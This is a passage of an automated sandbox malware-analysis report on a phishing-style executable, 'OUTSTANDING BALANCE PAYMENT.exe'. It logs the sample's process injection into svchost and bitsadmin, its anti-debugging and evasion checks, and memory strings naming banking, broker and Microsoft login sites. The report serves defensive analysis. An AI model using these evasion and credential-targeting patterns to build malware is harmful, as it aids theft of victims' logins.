                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic file information: File size 1230336 > 1048576
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2223313164.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2223964897.0000000000848000.00000004.00000020.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000003.2203222395.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000002.3859724974.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2223313164.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2223964897.0000000000848000.00000004.00000020.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000003.2203222395.0000000000C1B000.00000004.00000001.00020000.00000000.sdmp, hvGvYDBEAaXP.exe, 00000004.00000002.3859724974.0000000000C48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: hvGvYDBEAaXP.exe, 00000004.00000002.3859503425.000000000074E000.00000002.00000001.01000000.00000005.sdmp, hvGvYDBEAaXP.exe, 00000006.00000000.2322373186.000000000074E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2024610977.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2023684776.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2156736627.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2158622530.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.000000000309E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2257620178.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2255186520.000000000264D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2024610977.0000000003FC0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2023684776.0000000004110000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2156736627.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2158622530.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2255145705.000000000309E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, bitsadmin.exe, 00000005.00000003.2257620178.0000000002C32000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002F7E000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2255186520.000000000264D000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.3860608946.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: OUTSTANDING BALANCE PAYMENT.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7E01E LoadLibraryA,GetProcAddress,0_2_00B7E01E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B86B05 push ecx; ret 0_2_00B86B18
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402055 push edx; iretd 2_2_00402056
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004018A1 push edx; iretd 2_2_004018A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414930 push eax; retf 2_2_00414937
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004181E4 push ds; retf 2_2_004181E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040218B push ebp; iretd 2_2_00402192
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D9B6 push FFFFFFEBh; iretd 2_2_0040D9BF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041AA30 push edx; retf 2_2_0041AA31
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004192F1 push edx; ret 2_2_004192F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00425433 push edi; ret 2_2_00425483
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00403570 push eax; ret 2_2_00403572
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414658 push esp; ret 2_2_00414659
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00414E8B pushfd ; iretd 2_2_00414E91
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040A7C3 push edi; ret 2_2_0040A7F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D7CA push ecx; ret 2_2_0040D7CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0225F pushad ; ret 2_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F027FA pushad ; ret 2_2_02F027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F0283D push eax; iretd 2_2_02F02858
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD push ecx; mov dword ptr [esp], ecx2_2_02F309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F01368 push eax; iretd 2_2_02F01369
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02DE225F pushad ; ret 5_2_02DE27F9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02DE27FA pushad ; ret 5_2_02DE27F9
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02DE283D push eax; iretd 5_2_02DE2858
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02E109AD push ecx; mov dword ptr [esp], ecx5_2_02E109B6
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_02DE1368 push eax; iretd 5_2_02DE1369
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0032C445 push 13D671DEh; iretd 5_2_0032C44A
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_003307E1 push 00000063h; retf 5_2_00330810
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00324C71 push ds; retf 5_2_00324C74
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00330D0E push ds; retf 5_2_00330D14
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_00317250 push edi; ret 5_2_00317286
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_003274BD push edx; retf 5_2_003274BE
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BC8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00BC8111
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00B7EB42
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B8123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00B8123A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI/Special instruction interceptor: Address: 16B726C
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeEvaded block: after key decisiongraph_0-95238
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95784
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI coverage: 4.5 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3524Thread sleep count: 43 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exe TID: 3524Thread sleep time: -86000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe TID: 7056Thread sleep time: -50000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe TID: 7056Thread sleep time: -31500s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\bitsadmin.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BA6CA9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00BA60DD
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BA63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00BA63F9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BAEB60
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BAF5FA
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BAF56F FindFirstFileW,FindClose,0_2_00BAF56F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1B2F
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BB1C8A
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BB1F94
                Source: C:\Windows\SysWOW64\bitsadmin.exeCode function: 5_2_0032C640 FindFirstFileW,FindNextFileW,FindClose,5_2_0032C640
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00B7DDC0
                Source: z5f52P3-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: z5f52P3-.5.drBinary or memory string: discord.comVMware20,11696428655f
                Source: z5f52P3-.5.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: global block list test formVMware20,11696428655
                Source: bitsadmin.exe, 00000005.00000002.3862934594.0000000007986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: omVMware20,11696428655x
                Source: z5f52P3-.5.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: z5f52P3-.5.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: z5f52P3-.5.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: z5f52P3-.5.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: z5f52P3-.5.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: z5f52P3-.5.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: bitsadmin.exe, 00000005.00000002.3859638614.0000000002B42000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000007.00000002.2547581277.000001F246F6C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllww
                Source: z5f52P3-.5.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: z5f52P3-.5.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: z5f52P3-.5.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: hvGvYDBEAaXP.exe, 00000006.00000002.3859830366.00000000011AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: z5f52P3-.5.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: z5f52P3-.5.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: bitsadmin.exe, 00000005.00000002.3862934594.0000000007986000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: RL for global passwords blocklistVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: z5f52P3-.5.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: z5f52P3-.5.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: z5f52P3-.5.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: z5f52P3-.5.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI call chain: ExitProcess graph end nodegraph_0-94664
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeAPI call chain: ExitProcess graph end nodegraph_0-95530
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\bitsadmin.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7096E rdtsc 2_2_02F7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417B23 LdrLoadDll,2_2_00417B23
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00BB6AAF BlockInput,0_2_00BB6AAF
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B63D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00B63D19
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B93920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,0_2_00B93920
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_00B7E01E LoadLibraryA,GetProcAddress,0_2_00B7E01E
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_016B7538 mov eax, dword ptr fs:[00000030h]0_2_016B7538
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_016B74D8 mov eax, dword ptr fs:[00000030h]0_2_016B74D8
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exeCode function: 0_2_016B5E98 mov eax, dword ptr fs:[00000030h]0_2_016B5E98
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402E1 mov eax, dword ptr fs:[00000030h]2_2_02F402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov ecx, dword ptr fs:[00000030h]2_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03008324 mov eax, dword ptr fs:[00000030h]2_2_03008324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A2C3 mov eax, dword ptr fs:[00000030h]2_2_02F3A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300634F mov eax, dword ptr fs:[00000030h]2_2_0300634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F402A0 mov eax, dword ptr fs:[00000030h]2_2_02F402A0
